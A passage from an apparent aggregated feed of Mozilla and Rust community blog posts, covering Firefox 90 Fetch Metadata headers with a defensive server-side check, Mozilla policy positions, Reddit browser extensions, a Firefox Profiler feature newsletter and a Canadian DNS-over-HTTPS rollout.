Yet somehow I’m still at it, for more or less the same reasons that led me to accept my initial offer to join the A-team.2 The Internet has immense potential to be a force for individual empowerment, and yet more than ever we see this technology used to consolidate unchecked power, spread misinformation, and generally exploit people. Mozilla is not perfect (no organization is: 10 years anywhere will teach you that), but it’s one of the few remaining counter-forces to these accelerating trends. While I’m currently taking a bit of a break to explore some stuff on my own, I am looking forward to getting back to work on the mission when I return in mid-August.

  1. To the extent that Zen Buddhism is a religion. 

  2. I’ve since moved to Data @ Mozilla 

Mozilla Security BlogFirefox 90 supports Fetch Metadata Request Headers

We are pleased to announce that Firefox 90 will support Fetch Metadata Request Headers, which allow web applications to protect themselves and their users against various cross-origin threats like (a) cross-site request forgery (CSRF), (b) cross-site leaks (XS-Leaks), and (c) speculative cross-site execution side channel (Spectre) attacks.

Cross-site attacks on Web Applications

The fundamental security problem underlying cross-site attacks is that the web, by its open nature, does not allow web application servers to easily distinguish between requests originating from their own application and requests originating from a malicious (cross-site) application, potentially opened in a different browser tab.

Firefox 90 sends Fetch Metadata (Sec-Fetch-*) request headers, which allow web application servers to protect themselves against all sorts of cross-site attacks.

For example, as illustrated in the figure above, let’s assume you log into your banking site hosted at https://banking.com and conduct some online banking activities. Simultaneously, an attacker-controlled website, opened in a different browser tab and illustrated as https://attacker.com, performs some malicious actions.

Innocently, you continue to interact with your banking site, which ultimately causes the banking web server to receive some actions. Unfortunately, the banking web server has little to no way of telling who initiated those actions: you, or the attacker in the malicious website in the other tab. Hence the banking server, like web application servers in general, will most likely simply execute any action received and allow the attack to succeed.

Introducing Fetch Metadata

As illustrated in the attack scenario above, the HTTP request header Sec-Fetch-Site allows the web application server to distinguish between a same-origin request from the corresponding web application and a cross-origin request from an attacker-controlled website.

Inspecting Sec-Fetch-* headers ultimately allows the web application server to reject (or simply ignore) malicious requests because of the additional context they provide. In total there are four different Sec-Fetch-* headers: Dest, Mode, Site and User, which together allow web applications to protect themselves and their end users against the previously mentioned cross-site attacks.
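
To make this concrete, here is a minimal sketch of what such a server-side check could look like. The post doesn’t prescribe an implementation, so this is just one way to apply a “resource isolation policy”, written here as Node.js/Express middleware (the framework choice and the specific allow rules are assumptions for illustration):

const express = require("express");
const app = express();

app.use((req, res, next) => {
  const site = req.headers["sec-fetch-site"];

  // Older browsers don't send Sec-Fetch-* headers; let those requests through.
  if (site === undefined) {
    return next();
  }

  // Allow same-origin and same-site requests, plus user-initiated ones
  // (e.g. typing the URL into the address bar), which are marked "none".
  if (["same-origin", "same-site", "none"].includes(site)) {
    return next();
  }

  // Allow simple top-level navigations from other sites (e.g. clicked links),
  // but reject everything else, such as cross-site subresource loads.
  if (req.headers["sec-fetch-mode"] === "navigate" && req.method === "GET") {
    return next();
  }

  res.status(403).send("Cross-site request blocked");
});

Whether same-site requests or cross-site navigations should be allowed depends on the application; the point is that the server finally has enough context to make that decision.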

Going Forward

While Firefox will soon ship with its new Site Isolation security architecture, which will combat a few of the above issues, we recommend that web applications make use of the newly supported Fetch Metadata headers, which provide a defense-in-depth mechanism for applications of all sorts.

As a Firefox user, you can benefit from the additionally provided headers as soon as your Firefox auto-updates to version 90. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 90 supports Fetch Metadata Request Headers appeared first on Mozilla Security Blog.

Niko MatsakisCTCFT 2021-07-19 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place one week from today, on 2021-07-19 (in your time zone)! What follows are the abstracts for the talks we have planned. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Mentoring

Presented by: doc-jones

The Rust project has a number of mechanisms for getting people involved in the project, but most are oriented around 1:1 engagement. Doc has been investigating some of the ways that other projects engage contributors, such as Python’s mentored sprints. She will discuss how some of those projects run things and share some ideas about how that might be applied in the Rust project.

Lang team initiative process

Presented by: joshtriplett

The lang team recently established a new process we call initiatives. This is a refinement of the RFC process to include more explicit staging. Josh will talk about the new process, what motivated it, and how we’re trying to build more sustainable processes.

Driving discussions via postmortem analysis

Presented by: TBD

Innovation means taking risks, and risky behavior sometimes leads to process failures. An example of a recent process failure was the Rust 1.52.0 release and the subsequent 1.52.1 patch release that followed a few days later. Every failure presents an opportunity to learn from our mistakes and correct our processes going forward. In response to the 1.52.0 event, the compiler team recently went through a “course correction” postmortem process inspired by the “Correction of Error” reviews that pnkfelix has observed at Amazon. This talk describes the structure of a formal postmortem, and discusses how other Rust teams might deploy similar postmortem activities for themselves.

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.

Cameron KaiserTenFourFox FPR32 SPR2 available

TenFourFox Feature Parity Release 32 Security Parity Release 2 "32.2" is available for testing (downloads, hashes). There are no changes to the release notes and nothing particularly notable about the security patches in this release. Assuming no major problems, FPR32.2 will go live Monday evening Pacific time as usual.

The Mozilla BlogNet neutrality: reacting to the Executive Order on Promoting Competition in the American Economy

The Biden Administration today issued an Executive Order on Promoting Competition in the American Economy.

“Reinstating net neutrality is a crucial down payment on the much broader internet reform that we need and we’re glad to see the Biden Administration make this a priority in its new Executive Order today. Net neutrality preserves the environment that creates room for new businesses and new ideas to emerge and flourish, and where internet users can freely choose the companies, products, and services that they want to interact with and use. In a marketplace where consumers frequently do not have access to more than one internet service provider (ISP), these rules ensure that data is treated equally across the network by gatekeepers.” — Ashley Boyd, VP of Advocacy at Mozilla

In March 2021, we sent a joint letter to the FCC asking the Commission to reinstate net neutrality as soon as it is back in working order. Mozilla has been one of the leading voices in the fight for net neutrality for almost a decade, together with other advocacy groups. Mozilla has defended user access to the internet, in the US and around the world. Our work to preserve net neutrality has been a critical part of that effort, including our lawsuit against the FCC to keep these protections in place for users in the US.

The post Net neutrality: reacting to the Executive Order on Promoting Competition in the American Economy appeared first on The Mozilla Blog.

The Mozilla BlogMozilla responds to the UK CMA consultation on Google’s commitments on the Chrome Privacy Sandbox

Regulators and technology companies together have a unique opportunity to improve the privacy properties of online advertising. Improving privacy for everyone must remain the north star of efforts surrounding privacy-preserving advertising, and we welcome the recent moves by the UK’s Competition and Markets Authority to invite public comments on the recent voluntary commitments proposed by Google for its Chrome Privacy Sandbox initiative.

Google’s commitments are a positive step forward and a sign of tangible progress in creating a higher baseline for privacy protections on the open web. Yet, there remain ways in which the commitments can be made even stronger to promote competition and protect user privacy. In our submission, we focus on three specific points of feedback.

First, the CMA should work towards creating a high baseline of privacy protections and an even playing field for the open web. We strongly support binding commitments that would prohibit Google from self-preferencing when using the Chrome Privacy Sandbox technologies and from combining user data from certain sources for targeting or measuring digital ads on first and third party inventory. This approach provides a model for how regulators might protect both competition and privacy while allowing for innovation in the technology sector, and we hope to see this followed by other dominant technology platforms as well.

Second, Google should not be restricted from deploying limitations on the use of third-party cookies for pervasive web tracking; this should be made independent of the development of its Privacy Sandbox proposals. We encourage the CMA to reconsider requirements that would hinder efforts to build a more privacy-respecting internet. Given the widespread harms resulting from web tracking, we believe restrictions on the use of third-party cookies should be decoupled from the development of other Chrome Privacy Sandbox proposals, and that Google should have the flexibility to protect its users from cross-site tracking on an unconditional timeframe. By doing so, agencies such as the CMA and ICO would publicly acknowledge the importance of expeditiously limiting the role of third-party cookies in pervasive web tracking.

And third, relevant Chrome Privacy Sandbox proposals should be developed and deployed via formal processes at open standards bodies. It is critical for new functionality introduced by the Chrome Privacy Sandbox proposals to be thoroughly vetted by all relevant stakeholders, in a public and transparent manner, to understand its implications for privacy and competition. For this reason, we encourage the CMA to require an explicit commitment that relevant proposals are developed via formal processes and oversight at open standards development organizations (SDOs) and deployed pursuant to the final specifications.

We look forward to engaging with the CMA and other stakeholders in the coming months with our work on privacy preserving advertising, including but not limited to proposals within the Chrome Privacy Sandbox.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

The post Mozilla responds to the UK CMA consultation on Google’s commitments on the Chrome Privacy Sandbox appeared first on The Mozilla Blog.

Firefox Add-on ReviewsReddit revolutionized—use a browser extension to enhance your favorite forum

Reddit is awash with great conversation (well, not all the time). There’s a Reddit message board for just about everybody—sports fans, gamers, poets inspired by food, people who like arms on birds—you get the idea. 

If you spend time on Reddit, there are ways to greatly augment your experience with a browser extension… 

Reddit Enhancement Suite

Used by more than two million Redditors across various browsers, Reddit Enhancement Suite is optimized to work with the beloved “old Reddit” (the website underwent a major redesign in 2018; you can still access the prior design by visiting old.reddit.com).

Key features: 

  • Subreddit manager. Customize the top nav bar with your own subreddit shortcuts. 
  • Account switcher. Easily manage multiple Reddit accounts with a couple quick clicks. 
  • Show “parent” comment on hover. When you mouse over a comment, its “parent” comment displays. 
  • Dashboard. Fully customizable dashboard showcases content from subreddits, your message inbox, and more. 
  • User tagger. Tag specific users and subreddits so their activity appears more prominently.
  • Custom filters. Select words, subreddits, or even certain users that you want filtered out of your Reddit experience. 
  • New comment count. See the number of new comments on a thread since your last visit. 
  • Never Ending Reddit. Just keep scrolling down the page; new content will continue loading (until you reach the end of the internet?). 

Old Reddit Redirect

Speaking of the former design, Old Reddit Redirect provides a straightforward function. It simply ensures that every Reddit page you visit will redirect to the old.reddit.com domain. 

Sure, if you have a Reddit account the site gives you the option of using the old design, but with the browser extension you’ll get the old site whether you’re logged in or not. It’s also great for when you click Reddit links shared from the new domain.
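
For the curious, the core of such an extension can be tiny. This is not Old Reddit Redirect’s actual source, just a sketch of the general WebExtensions technique; it assumes a background script with "webRequest", "webRequestBlocking", and *://www.reddit.com/* permissions declared in manifest.json:

// Rewrite www.reddit.com page loads to old.reddit.com before they happen.
browser.webRequest.onBeforeRequest.addListener(
  (details) => {
    const url = new URL(details.url);
    if (url.hostname === "www.reddit.com") {
      url.hostname = "old.reddit.com";
      return { redirectUrl: url.href };
    }
    return {};
  },
  { urls: ["*://www.reddit.com/*"], types: ["main_frame"] },
  ["blocking"]
);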

Reddit on YouTube

Bring Reddit with you to YouTube. Whenever you’re on a YouTube page, Reddit on YouTube searches for Reddit posts that link to the video and embeds those comments into the YouTube comment area. 

You can easily toggle between Reddit and YouTube comments and select either one to be your default preference. 

<figcaption>If there are multiple Reddit threads about the video you’re watching, the extension will display them in tab form in the YouTube comment section. </figcaption>
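
Under the hood, finding the discussions for a given video can be as simple as asking Reddit which posts link to a URL. Here is a sketch of that lookup using Reddit’s public info endpoint; the extension’s actual implementation may well differ:

// Look up Reddit posts that link to a given YouTube video.
async function findRedditThreads(videoUrl) {
  const endpoint =
    "https://www.reddit.com/api/info.json?url=" + encodeURIComponent(videoUrl);
  const response = await fetch(endpoint);
  const data = await response.json();
  // Each child is a post; keep its title, permalink, and comment count.
  return data.data.children.map(({ data: post }) => ({
    title: post.title,
    permalink: "https://www.reddit.com" + post.permalink,
    comments: post.num_comments,
  }));
}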

Reddit Ad Remover

Sick of seeing so many “Promoted” posts and paid advertisements in the feed and sidebar? Reddit Ad Remover silences the noise. 

The extension even blocks auto-play video ads, which is great for people who don’t appreciate sudden bursts of commercial sound. Hey, somebody should create a subreddit about this.

Happy redditing, folks. Feel free to explore more news and media extensions on addons.mozilla.org.

Mozilla Performance BlogPerformance Tools Newsletter (H1 2021)

As the Perf-Tools team, we are responsible for the Firefox Profiler. This tool is built directly into Firefox to help you understand a program’s runtime behavior and analyze it to make Firefox faster. If you are not familiar with it, I would recommend looking at our user documentation.

If you are curious about the profiler but not sure where to start, I’ve also given a FOSDEM talk this year about using the Firefox Profiler for web performance analysis, which is a good introduction to the tool.

During our talks with the people who use the Firefox Profiler frequently, we realized that new features can be too subtle to notice or easily overlooked. So we’ve decided to prepare this newsletter to let you know about the new features and the improvements that we’ve made in the past 6 months. That way, you can continue to use it to its full potential!

Table of Contents

  1. New features
    1. Enabled the new profiler recording panel in Dev Edition
    2. Visualization of the CPU utilization
    3. Sample graph to show the samples’ position in the timeline
    4. Delete button on the profile viewer page
    5. Stacks now include the category color of each stack frame
    6. Profiler Rust API for thread registration has landed
    7. Firefox Profiler Analysis UI is now internationalized
    8. Screenshots are now visible while selecting a time range
    9. Android Trace format support
    10. “Profiler” category showing the profiler overhead
    11. “Show all tracks” button in the timeline tracks context menu
  2. Improvements
    1. Better network markers
    2. Better stack walking around JIT
    3. Better marker context menu
    4. Marker improvements
      1. New markers
      2. Fixes & Improvements
    5. Capturing a stack and adding category support for the JavaScript ChromeUtils.addProfilerMarker API
    6. Tooltips in the network track
    7. Made the Profile Info button more explicit
    8. Android device information inside the Profile Info panel
    9. Zip file viewer now automatically expands all the children
    10. New label frames for XPIDL method/getter/setter calls
    11. Profiler buffer memory is no longer counted in the profiler memory tracks
    12. Improved accessibility in the Network Chart
    13. Removed many MOZ_GECKO_PROFILER ifdefs
  3. What’s next?
  4. Conclusion

So, let’s get started with the new features.

New features

Enabled the new profiler recording panel in Dev Edition

In the DevTools panel, we still had the old performance tab. That tool was pretty old and hadn’t been well maintained for a while. The new Firefox Profiler is a lot more comprehensive compared to the old tool, and we aim to make it the new default. We’ve hit a big milestone and enabled it in Firefox Dev Edition. We are hoping to get rid of the old panel soon. Thanks to Nicolas Chevobbe and Julian Descottes from the DevTools team for helping out on this!

Visualization of the CPU utilization

Previously, the height of the activity graph (the graph in the pictures) wasn’t directly tied to the actual amount of work done: we were setting the height to 100% whenever we saw a non-idle sample, and then applying some smoothing. Now, we collect CPU usage information from Firefox and draw the height of this graph to match the CPU usage of the thread. This lets you see which parts of the thread are using more CPU and which are using less. This matters because users already assumed that the height meant CPU usage, which wasn’t the case before; the graph now matches that expectation.

This new implementation also reveals the places where Firefox is unresponsive but the thread is not using any CPU, which can mean that the thread is blocked.

When the graph height is low, besides waiting for another thread, it can also mean that the thread is doing a lot of disk reads or writes, or that the whole system is busy with a heavy task and not giving Firefox enough CPU time to run. Previously, it wasn’t possible to distinguish these cases, but thanks to the CPU usage information, we can now understand them by looking at a profile.

Here are two example profiles. Both are from a startup of Firefox, but the first one is a warm startup, whereas the second one is a cold startup. You will notice easily that the graph height on the cold startup is a lot lower compared to the warm one. This is because on cold startups, we are reading a lot of data from the disk, and the reference laptop we used to capture these profiles has a slow disk:

You can see the new radio button with "Categories with CPU" in the top left corner of Firefox Profiler

Now we have “Categories with CPU” as a graph type. You can see that the graph is different now when CPU usage numbers differ.

Sample graph to show the samples’ position in the timeline

With the previous CPU utilization work, we also added another graph underneath the activity graph. As visible in the image below, you can now see the exact locations of the samples in this graph, and you can click on them to select that sample’s stack. With this graph, it’s also possible to see where we have missing samples. Missing samples usually mean that the profiler can’t keep up with the sampling, and we don’t know exactly what’s happening in those areas of the timeline. If you have many missing samples, you can try to reduce the profiler’s overhead, for example by increasing the sampling interval, because the captured profile data is less reliable when the profiler can’t sample regularly enough.

Sample Graph can be found at the bottom of the activity graph in the timeline

Delete button on the profile viewer page

You can find it inside the “Profile Info” popup in the top right corner, if you uploaded that profile. We previously added a page to manage your uploaded profiles, but adding the delete button to the analysis UI was also important, so you can delete an uploaded profile directly. We keep a key in your browser’s local storage to record that you uploaded that profile data, so to be able to delete it, you need to use the same browser you uploaded it from.

Profile delete button can be found inside the "Profile Info" panel at the top right corner.

Stacks now include the category color of each stack frame

This is a small but nice addition. We show stacks in tooltips, the marker table, and the sidebar. Previously, it wasn’t possible to tell which function belongs to which category. With this change, you can now see each frame’s category color on its left side, giving you a quick overview of what’s happening in the stack.

Profiler Rust API for thread registration has landed

The Gecko Profiler didn’t have a canonical Rust API. We had hacks for multiple Rust projects; they were all similar, but with subtle implementation differences. If you wanted to use profiler API functions in a new Rust project, you had to write everything from scratch each time. We’ve decided to make a canonical Rust crate for the profiler, so people who work on Rust code can easily import it and start using it immediately. We’ve now landed the first part of this API, which covers thread registration.

If you are working on a Rust project with multiple threads, don’t forget to register your threads with the Gecko Profiler. After registering them, you will be able to profile them by adding the thread names (or part thereof) to the custom thread names input in about:profiling. It’s pretty straightforward to register them with gecko_profiler::register_thread and gecko_profiler::unregister_thread.

More Rust API functions for the profiler are coming soon!

Firefox Profiler Analysis UI is now internationalized

Our Outreachy intern Hasna Hena Mow (CipherGirl) has worked on the internationalization of profiler.firefox.com, and thanks to her, this work is now complete! The actual translation process is happening now.

A quick look at our localization work. The picture shows that most of the strings in the profiler analysis UI are now localized.

Screenshots are now visible while selecting a time range

That’s another nice usability improvement. Previously, it wasn’t possible to see the screenshots while selecting a time range. That was a bit annoying, because screenshots are good indicators of what’s happening at a given time, which makes them especially helpful when choosing a range. Now you can see them while making a selection!

Android Trace format support

You can now easily import the Android trace format into the Firefox Profiler analysis UI. Just drag and drop the .trace file into profiler.firefox.com and it will import and open the profile data automatically, without any additional steps. You can also open it using the “Load a profile from file” button.

“Profiler” category showing the profiler overhead

We’ve added a new category to show the profiler overhead. This is a pretty interesting indicator that we didn’t have before, because it shows how much the profiler itself is affecting the profile being captured. After capturing a profile, if you see a lot of red categories in the timeline, it usually means that the profiler is working too hard and possibly skewing the data. In this case, you can try to reduce the profiler’s overhead by going to the about:profiling page and increasing the interval or disabling some of the features.

"Profiler" category will be displayed as red colors in the graph. Also it's possible to see the category in the sidebar category breakdown.

“Show all tracks” button in the timeline tracks context menu

Another small feature to quickly make all the tracks visible! Quite handy when you have a lot of tracks and don’t know what you are looking for.

"Show All Tracks" button can be found inside the context menu that appears when you click on "X/Y tracks visible" button.

Improvements

Better network markers

Our network markers weren’t always reliable, especially when it comes to service workers. They were mostly marked as “unfinished markers” and not displayed in the front-end because they weren’t recorded correctly. We’ve made a lot of improvements so they are recorded properly and in the correct places. More fixes are coming in this area.

New network markers that belong to a service worker inside the "Network" tab.

Better stack walking around JIT

This was another big task we had wanted to fix for a while. Sometimes, when a stack included JIT (Just-In-Time-compiled JavaScript) frames, the stack walker would fail to find their native calling functions, causing a large number of samples to appear in locations separate from where they should have been. The profiler can now use JIT information to correctly restart stack walking when needed. It’s a platform-dependent task, and only 64-bit Windows is fixed for now. macOS fixes are in review and will land soon, with other platforms to follow in the coming months.

Better marker context menu

We display context menus in various places, including the marker context menu inside the Marker Chart and Marker Table panels. Previously, it wasn’t easy to find the item you wanted to click, even for people used to the profiler. Now, with better wording, icons, and bold text where necessary, it’s a lot easier to understand and find the right item.

Right-clicking on a marker will open a context menu where you can perform various marker operations.

Marker improvements

New markers:
  • SetNeedStyleFlush
    • This marker is useful when you are curious about when and where a potential style invalidation happened.
  • Runnable
    • This marker shows when a runnable is executed. It is especially useful for identifying tasks that repeatedly take very little CPU time; these were impossible to find with only periodic stack sampling.
  • Sync IPC
    • Sync IPC is a common cause of slowness or blocked threads. You can easily see them with these markers now.
  • CSS animation
    • It’s useful when you want to see which animation is running at a point in time. It also includes the animation name.
  • CSS transition
    • It’s useful when you want to see if a transition is running. It also includes the transitioned property name.
  • Perform microtasks
    • It’s useful to know when microtasks are executed.
  • Worker.postMessage
    • It’s useful to know for sure which worker is involved. It either includes the worker name or the script url.
  • RefreshObserver
    • It’s useful when you need to figure out why a refresh driver keeps firing, and it is doing so because it still has observers.
  • Image Load and Image Paint
    • They are useful when you need to see when an image loads and paints.
  • Test markers (in TestUtils.jsm and BrowserTestUtils.jsm)
    • It’s useful when you are profiling a test. You can see more information about the state of the test and have an idea of what’s happening in the timeline.
    • They are also being displayed first in the Marker Chart, as they are very relevant when they exist.
  • Process Priority
    • These markers track process priority change when they are done in the parent process, and also when child processes receive the corresponding notification. It’s useful to see if some low responsiveness may be due to priorities.
Fixes & Improvements:
  • We added more Inner Window IDs to the markers. The tooltips in the analysis UI show which markers belong to which URLs with this information.
  • Now you can see the proportion of nursery-allocated strings that were deduplicated on the GC Minor markers thanks to :sfink.
    GC Minor marker tooltip includes the proportion of nursery-allocated strings that were deduplicated.
  • Fixed an annoying bug where dot markers appeared in the wrong place, with the location changing depending on the zoom level. Now, our small markers are more reliable.
    Now you can click on the correct marker even though it's very small.
  • Marker tooltips now display the inner window ids if there are multiple pages with the same URL, whether it’s a webpage URL or an internal chrome URL. In this example, there were multiple browser.xhtml documents due to multiple windows; you can now figure out whether they are the same browser.xhtml document or not. You can see the id at the right side of the URL now.

Capturing a stack and adding category support for the JavaScript ChromeUtils.addProfilerMarker API

You may know the ChromeUtils.addProfilerMarker API for capturing a profiler marker from JavaScript. With this change, the API now supports capturing a stack and attaching a category to markers. Capturing a stack is important when you need to know the cause of an event, and it shows up in marker tooltips in the analysis UI. Similarly, categories show up in the marker’s tooltip in the Marker Chart and in the sidebar of the Marker Table.
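
As a rough sketch, a call using these new options could look like the following, from privileged (chrome) JavaScript where Cu (Components.utils) is available. Treat the exact values as assumptions for illustration; doSomeExpensiveWork() is a placeholder, not a real function:

const startTime = Cu.now();
doSomeExpensiveWork(); // placeholder for the code being measured
ChromeUtils.addProfilerMarker("MyFeature", {
  startTime,              // the marker spans from startTime to now
  captureStack: true,     // capture the JS stack as the marker's cause
  category: "JavaScript", // category shown in tooltips and the sidebar
}, "optional details text");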

Tooltips in the network track

We have the network track for visualizing network markers. Previously it only showed where a network request starts and ends; to see more, you had to switch to the “Network” tab. Now you can hover over any network request in this track and see information about it in a tooltip. More improvements are coming in this area!

Made the Profile Info button more explicit

We have a profile info button in the top right corner of the analysis page. When you click on this button, we open the Profile Info panel, where we display the metadata gathered from Firefox. This metadata includes profile-related information like recording time and settings, application information like Firefox version and build ID, and platform information like OS, ABI, and CPU. We got some feedback that this button wasn’t very visible or explicit. Now, it is.

Before: it was displayed as “Uploaded Profile”.
After: it’s now displayed as “Profile Info”.

Android device information inside the Profile Info panel

This is a small usability improvement for Android folks, in the panel discussed in the previous improvement. Previously, it was possible to see the Android version, ABI, and CPU information in the Platform section, but not the device name, which is pretty important most of the time. Now, you can see it in the Profile Info panel in the top right corner.

After opening the Profile Info panel on the top right corner, you will find the "Device" field under the Platform section

You can see that information under the “Platform” section inside the Profile Info panel.

Zip file viewer now automatically expands all the children

This is another usability improvement. When you open profile data from a zip file (like the ones from Treeherder), it’s not always easy to find the profile you want, especially because Treeherder puts the profile files in a folder buried under other folders. Now the file is just a click away, because the zip file viewer expands all the children automatically.

All the children will be expanded automatically when you open a zip file.

New label frames for XPIDL method/getter/setter calls

When JavaScript code calls an XPIDL method/getter/setter, we weren’t doing a good job of showing it. Now, with the new label frames, you can see these calls easily, along with a category change. It’s similar to what we already had for WebIDL.

Profiler buffer memory is no longer counted in the profiler memory tracks

A recent Profiler buffer change was affecting the memory track and was making it hard to see small memory changes unrelated to the Profiler (which typically uses 1MB chunks). With this change, it’s now possible to see these small changes.

Improved accessibility in the Network Chart

The Network Chart panel is more usable with only a keyboard now!

Removed many MOZ_GECKO_PROFILER ifdefs

Fewer places to potentially break on Tier-3 platform builds! We are still incrementally reducing the MOZ_GECKO_PROFILER ifdefs to make our lives, and our users’ lives, easier.

What’s next?

We’ve talked about the things we have done so far, but there are also many things we would still like to do. I want to mention some of them here, in case you are curious. It’s not a complete list, but it should give you an idea of the direction we are heading as the Performance Tools team.

There is some unfinished work we would like to complete, like shipping the Firefox Profiler in the DevTools panel (also known as the unified profiler project), finishing the JIT stack walking fixes, and landing more Rust profiler APIs. But we also want to work on some new things: reducing the overhead of the profiler, making it easier to find unregistered threads, better support for profiling with many threads, better IPC markers, collecting CPU usage of all threads and/or processes, and many more usability improvements and polish.

If you also have something on your mind about the things we can improve, please let us know!

Conclusion

Thanks for reading this far! It’s been a busy first half of 2021, and we intend to continue making the Firefox Profiler better with the things I discussed in the previous section. If you have any questions or feedback, please feel free to reach out to me on Matrix (@canova:mozilla.org). You can also reach out to our team on the Firefox Profiler channel on Matrix (#profiler:mozilla.org).

If you profiled something and are puzzled by the profile you captured, we also have the Joy of Profiling (#joy-of-profiling:mozilla.org) channel, where people share their profiles and get help from people who are more familiar with the Firefox Profiler. In addition, we have the Joy of Profiling open sessions, where some Firefox Profiler and performance engineers gather on Zoom to answer questions or analyze the profiles you captured. These usually happen every Monday; you can follow the “Performance Office Hours” calendar to learn more.

Mozilla Privacy BlogMozilla publishes policy recommendations for EU Digital Markets Act

As the Digital Markets Act (DMA) progresses through the legislative mark-up phase, we’re today publishing our policy recommendations on how lawmakers in the European Parliament and EU Council should amend it.

We welcomed the publication of the DMA in December 2020, and we believe that a vibrant and open internet depends on fair conditions, open standards, and opportunities for a diversity of market participants. With targeted improvements and effective enforcement, we believe the DMA could help restore the internet as the universal platform where any company can advertise itself and offer its services, any developer can write code and collaborate with others to create new technologies on a fair playing field, and any consumer can navigate information, use critical online services, connect with others, find entertainment, and improve their livelihood.

Our key recommendations can be summarised as follows:

  • Consumer Control: The DMA should ban dark patterns and other forms of manipulative design techniques. Data portability should also be included in the proposal to reduce switching costs for consumers.
  • Interoperability: We propose to expand the interoperability mandate to allow regulators to restrain gatekeepers from behaviour that explicitly goes against the spirit of interoperability. It should also be extended to cover not only ancillary services but the relationship between core services.
  • Innovation not discrimination: We propose to broaden the prohibition on self-preferencing in ranking systems to a general prohibition so as to address any problematic affiliated preferencing by gatekeepers of their own products in operating systems.
  • Meaningful Privacy: We underline our support for the provision which prohibits data sharing between gatekeeper verticals, and encourage the effective enforcement of the GDPR.
  • Effective Oversight & Enforcement: We recommend that the oversight framework involve National Regulatory Authorities to reduce bottlenecks in investigations and enforcement.

We spell out these recommendations in detail in our position paper, and provide practical guidance for lawmakers on how to amend the DMA draft law to incorporate them. As the DMA discussions continue in earnest, we look forward to working with EU lawmakers and the broader community of policy stakeholders to help ensure a final legislative text that promotes a healthy internet that puts competition and consumer choice first.

The post Mozilla publishes policy recommendations for EU Digital Markets Act appeared first on Open Policy & Advocacy.

The Mozilla BlogFirefox extends privacy and security of Canadian internet users with by-default DNS-over-HTTPS rollout in Canada

CIRA Joins Firefox’s Trusted Recursive Resolver Program

In a few weeks, Firefox will start the by-default rollout of DNS over HTTPS (or DoH for short) to its Canadian users in partnership with local DoH provider CIRA, the Canadian Internet Registration Authority. DoH will first become the default for 1% of Canadian Firefox users and will gradually reach 100% of them, further increasing their security and privacy online. This follows the by-default rollout of DoH to US users in February 2020.

As part of the rollout, CIRA joins Mozilla’s Trusted Recursive Resolver (TRR) Program and becomes the first internet registration authority and the first Canadian organization to provide Canadian Firefox users with private and secure encrypted Domain Name System (DNS) services.

“Unencrypted DNS is a major privacy issue and part of the legacy of the old, insecure, Internet. We’re very excited to be able to partner with CIRA to help fix that for our Canadian users and protect more of their browsing history by default.”

Eric Rescorla, Firefox CTO.

“Protecting the privacy of Canadians is a key element of restoring trust on the internet. Our goal is to cover as many Canadians as possible with Canadian Shield, and that means finding like-minded partners who share our values. We are proud to be the first Canadian participant in the Trusted Recursive Resolver (TRR) Program and are always seeking out new ways to extend the reach of Canadian Shield to enhance the privacy of Canadians.”  

Byron Holland, president and CEO, CIRA.

Once enrolled, Firefox users located in Canada will see a panel pop up (see screenshot below) asking them to approve or opt out of DoH protection. If they go to Settings in the Firefox menu, scroll down to the Network Settings section, and click the Network Settings button, a dialogue box will open. Canadian Firefox users will be able to confirm that “CIRA Canadian Shield” is enabled by looking at the bottom of the dialogue box. They will also have the option to choose Cloudflare or NextDNS as an alternative Trusted Recursive Resolver.

<figcaption>Firefox users in Canada will see a panel letting them know that their DNS requests are encrypted and routed through a DNS over HTTPS provider who has joined Mozilla’s Trusted Recursive Resolver Program</figcaption>
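
For readers who don’t want to wait for the gradual rollout, DoH can also be enabled by hand. Here is a sketch using Firefox’s about:config preferences in a user.js file; the pref names are real, and the resolver URL shown is Cloudflare’s Mozilla endpoint, used here purely as an example (any resolver from the TRR Program works):

// network.trr.mode: 2 = try DoH first and fall back to native DNS,
// 3 = DoH only with no fallback, 0 = off (the default).
user_pref("network.trr.mode", 2);
// The DoH resolver to use; shown here is Cloudflare's Mozilla endpoint.
user_pref("network.trr.uri", "https://mozilla.cloudflare-dns.com/dns-query");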

For more than 35 years, DNS has served as a key mechanism for accessing sites and services on the internet. Functioning as the internet’s address book, DNS translates website names, like Firefox.com and cira.ca, into the internet addresses that a computer understands so that the browser can load the correct website.

Since 2018, Mozilla, CIRA, and other industry stakeholders have been working to develop, standardize, and deploy a technology called DNS over HTTPS (or DoH). DoH helps to protect browsing activity from interception, manipulation, and collection in the middle of the network by encrypting the DNS data.

Encrypting DNS data with DoH is the first step. A necessary second step is to require that the companies handling this data have appropriate rules in place – like the ones outlined in Mozilla’s TRR Program. This program aims to standardize requirements in three areas: limiting data collection and retention from the resolver, ensuring transparency for any data retention that does occur, and limiting any potential use of the resolver to block access or modify content. By combining the technology, DoH, with strict operational requirements for those implementing it, participants take an important step toward improving user privacy.

CIRA is the latest resolver, and the first internet registration authority, to join Firefox’s TRR Program, joining Cloudflare, NextDNS and Comcast. Mozilla began the rollout of encrypted DNS over HTTPS (DoH) by default for US-based Firefox users in February 2020, but began testing the protocol in 2018 and DoH has been available worldwide for Firefox users who choose to turn it on.

DoH is just one of the many privacy protections we provide to our users, like Enhanced Tracking Protection by default in Firefox and the Mozilla VPN.

The post Firefox extends privacy and security of Canadian internet users with by-default DNS-over-HTTPS rollout in Canada appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 398

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is css-inline, a crate to inline CSS from style tags into style attributes.

Thanks to Dmitry Dygalo for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

